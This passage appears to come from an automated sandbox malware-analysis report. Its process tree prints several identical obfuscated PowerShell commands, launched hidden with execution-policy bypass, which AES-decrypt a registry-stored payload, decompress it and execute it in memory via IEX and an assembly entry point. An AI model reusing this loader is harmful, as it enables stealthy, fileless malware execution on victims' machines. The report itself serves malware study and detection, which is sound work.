'').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Hide Artifacts: Hidden Window
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:752
                                                                                                                    • C:\Windows\$sxr-powershell.exe
                                                                                                                      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3896).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Hide Artifacts: Hidden Window
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:4908
                                                                                                                    • C:\Windows\$sxr-powershell.exe
                                                                                                                      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3896).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Hide Artifacts: Hidden Window
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:4324
                                                                                                                    • C:\Windows\$sxr-powershell.exe
                                                                                                                      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3896).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Hide Artifacts: Hidden Window
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:2816
                                                                                                                    • C:\Windows\$sxr-powershell.exe
